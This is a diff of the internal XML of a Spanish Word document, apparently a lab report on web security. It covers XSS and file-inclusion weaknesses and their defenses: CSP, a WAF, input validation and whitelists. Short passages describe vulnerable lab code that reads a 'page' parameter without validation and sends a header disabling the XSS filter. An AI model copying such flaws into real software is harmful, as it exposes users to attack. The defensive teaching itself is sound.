+      <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="39"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Aplicar las “Content Security Policy” (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>CSP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="39"/>
+        </w:numPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Implementación de un WAF (Web Application Firewall), que, al igual que en las SQLi, ayudan a impedir la ejecución de ataques XSS.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLconformatoprevio"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3420,37 +3637,36 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ejemplo </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">completo </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>de Código Seguro</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>:</w:t>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>2.2.4. Ejemplo de Mejora de código para el nivel bajo</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3467,13 +3683,14 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="435983A0" wp14:editId="7E665A43">
-            <wp:extent cx="5019675" cy="2601595"/>
-            <wp:effectExtent l="0" t="0" r="9525" b="8255"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="435983A0" wp14:editId="5F6E0124">
+            <wp:extent cx="4943475" cy="2667000"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
             <wp:docPr id="896475280" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -3494,7 +3711,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5019675" cy="2601595"/>
+                      <a:ext cx="4943475" cy="2667000"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -3521,349 +3738,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="HTMLconformatoprevio"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLconformatoprevio"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLconformatoprevio"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLconformatoprevio"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLconformatoprevio"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLconformatoprevio"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Fira Code" w:eastAsia="Times New Roman" w:hAnsi="Fira Code" w:cs="Fira Code"/>
-          <w:color w:val="383A42"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>2.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>2.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>4</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Recomendaciones</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Prrafodelista"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Validar y san</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>ear</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> todas las entradas del usuario</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>asegurando</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> que solo se puedan incluir archivos permitidos.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Prrafodelista"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Utiliza</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ción de </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>listas blancas</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Prrafodelista"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Configurar el servidor para restringir el acceso a archivos sensibles</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>, asegurando que</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> los archivos críticos no sean accesibles desde la web.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Prrafodelista"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
@@ -3880,8 +3754,9 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">2.3. </w:t>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2.3.- </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3918,14 +3793,14 @@
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:noProof/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74BFE415" wp14:editId="5E3454A0">
-            <wp:extent cx="5400040" cy="1382233"/>
-            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
-            <wp:docPr id="896840093" name="Imagen 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29DDD420" wp14:editId="56B11683">
+            <wp:extent cx="5400040" cy="1832292"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="230935249" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -3933,7 +3808,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="896840093" name=""/>
+                    <pic:cNvPr id="725998784" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -3945,7 +3820,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5411878" cy="1385263"/>
+                      <a:ext cx="5400040" cy="1832292"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -4006,18 +3881,30 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="13"/>
+          <w:numId w:val="42"/>
         </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
@@ -4035,128 +3922,188 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="13"/>
+          <w:numId w:val="42"/>
         </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>El script obtiene el valor de</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> entrada del usuario del </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>parámetro 'page' de la URL</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> de la web, asignándose directamente a la variable sin validación inicial.</w:t>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Al igual que en el nivel bajo se inicia con la cabecera </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>header ("X-XSS-Protection: 0")</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:shadow w14:blurRad="38100" w14:dist="25400" w14:dir="5400000" w14:sx="100000" w14:sy="100000" w14:kx="0" w14:ky="0" w14:algn="ctr">
+            <w14:srgbClr w14:val="6E747A">
+              <w14:alpha w14:val="57000"/>
+            </w14:srgbClr>
+          </w14:shadow>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>lo que establece que el filtro de protección contra ataques XSS esta desactivado, pero como ya se ha comentado anteriormente, este método de seguridad ha quedado obsoleto, aplicándose en la actualidad formas más sofisticados y que aportan mayor seguridad, tanto a nivel de navegadores web, como en la implementación de las políticas de seguridad de contenidos (CSP).</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Prrafodelista"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="13"/>
+          <w:numId w:val="42"/>
         </w:numPr>
